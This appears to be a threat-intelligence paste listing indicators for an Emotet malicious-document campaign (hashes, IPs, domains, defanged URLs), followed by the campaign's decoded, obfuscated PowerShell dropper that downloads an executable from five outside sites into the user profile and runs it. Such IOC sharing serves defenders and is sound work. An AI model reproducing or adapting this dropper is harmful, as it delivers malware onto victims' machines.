Advertisement
paladin316

Emotet_Doc_out_2019-09-24_12_07.txt

Sep 24th, 2019
1,382
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.32 KB | None | 0 0
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. MD5:
  4. 62e637e3c69e7f81695507be82bc9357
  5. ad23f4c0e775c1e50d1886c3d097fb88
  6. d1def7c0183f8e11a56b018513ae0838
  7. fc3d54c6f661e56295773e9baeb56c63
  8.  
  9.  
  10. IPs:
  11. 104.28.4.10
  12. 162.241.48.174
  13. 201.131.96.138
  14. 46.242.253.95
  15.  
  16.  
  17. Domains:
  18. aysotogaziantep.com
  19. krzewy-przemysl.pl
  20. laalpina.cl
  21. www.noshnow.co.uk
  22. www.studiomovil.com.mx
  23.  
  24.  
  25. URLs:
  26. hxxps://www.studiomovil.com.mx/wp-content/erRpJAmInz/
  27. hxxp://krzewy-przemysl.pl/wp-includes/yf1etsmsp_esqjtujn-589/
  28. hxxp://laalpina.cl/sisi/cncXoJaqj/
  29. hxxp://aysotogaziantep.com/wp-content/DSovUnSbnf/
  30. hxxp://www.noshnow.co.uk/ybzew/wMaxwSMC/
  31.  
  32.  
  33. Decoded Base64 Powershell:
  34. $Bwsrjto='Zubv5q1';
  35. $Ajjq36 = '191';
  36. $Cm6zsc='Oasdq8zq';
  37. $Ooju7v=$env:userprofile+'\'+$Ajjq36+'.exe';
  38. $Q4izbvi1='Dpjju28f';
  39. $Wiiiorcs=.('new'+'-obje'+'ct') NeT.webcLiEnt;
  40. $Aolild='hxxps://www.studiomovil.com.mx/wp-content/erRpJAmInz/
  41. hxxp://krzewy-przemysl.pl/wp-includes/yf1etsmsp_esqjtujn-589/
  42. hxxp://laalpina.cl/sisi/cncXoJaqj/
  43. hxxp://aysotogaziantep.com/wp-content/DSovUnSbnf/
  44. hxxp://www.noshnow.co.uk/ybzew/wMaxwSMC/'."sPl`iT"('
  45. ');
  46. $Zfw0sv7a='Cizdf5o5';
  47. foreach($Nwj20ri in $Aolild){try{$Wiiiorcs."do`wnloA`dfi`le"($Nwj20ri, $Ooju7v);
  48. $Grido7t='N1kctmb6';
  49. If ((&('Get'+'-Ite'+'m') $Ooju7v)."len`gTh" -ge 23068) {[Diagnostics.Process]::"S`Tart"($Ooju7v);
  50. $L8zu9is3='T355j92';
  51. break;
  52. $P2wsi3b='C5wjwuk9'}}catch{}}$O6ir5r='Y9aiakk'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement